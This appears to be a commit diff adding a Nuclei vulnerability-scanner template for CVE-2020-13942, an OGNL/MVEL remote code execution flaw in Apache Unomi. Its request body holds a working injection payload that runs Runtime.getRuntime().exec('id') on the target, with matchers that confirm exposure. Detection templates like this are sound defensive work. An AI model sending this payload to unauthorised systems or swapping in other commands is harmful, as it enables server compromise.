commit
1ec8040a8d
|
@ -0,0 +1,60 @@
|
|||
id: cve-2020-13942
|
||||
|
||||
info:
|
||||
name: Apache Unomi Remote Code Execution
|
||||
author: dwisiswant0
|
||||
severity: critical
|
||||
description: |
|
||||
Remote Code Execution in Apache Unomi.
|
||||
Apache Unomi allows conditions to use OGNL and MVEL scripting which
|
||||
offers the possibility to call static Java classes from the JDK
|
||||
that could execute code with the permission level of the running Java process.
|
||||
This vulnerability affects all versions of Apache Unomi prior to 1.5.2. Apache Unomi users should upgrade to 1.5.2 or later.
|
||||
|
||||
References:
|
||||
- https://securityboulevard.com/2020/11/apache-unomi-cve-2020-13942-rce-vulnerabilities-discovered/
|
||||
- https://twitter.com/chybeta/status/1328912309440311297
|
||||
|
||||
requests:
|
||||
- method: POST
|
||||
path:
|
||||
- "{{BaseURL}}/context.json"
|
||||
- "{{BaseURL}}:8181/context.json"
|
||||
headers:
|
||||
Content-Type: application/json
|
||||
body: |
|
||||
{
|
||||
"filters": [
|
||||
{
|
||||
"id": "nuclei",
|
||||
"filters": [
|
||||
{
|
||||
"condition": {
|
||||
"parameterValues": {
|
||||
"nuclei": "script::Runtime.getRuntime().exec('id')"
|
||||
},
|
||||
"type": "profilePropertyCondition"
|
||||
}
|
||||
}
|
||||
]
|
||||
}
|
||||
],
|
||||
"sessionId": "nuclei"
|
||||
}
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
- type: word
|
||||
words:
|
||||
- "application/json"
|
||||
- "context-profile-id"
|
||||
condition: and
|
||||
part: header
|
||||
- type: regex
|
||||
regex:
|
||||
- "(profile|session)(Id|Properties|Segments)"
|
||||
- "[a-f0-9]{8}-[a-f0-9]{4}-[a-f0-9]{4}-[a-f0-9]{4}-[a-f0-9]{12}"
|
||||
condition: and
|
||||
part: body
|
Loading…
Reference in New Issue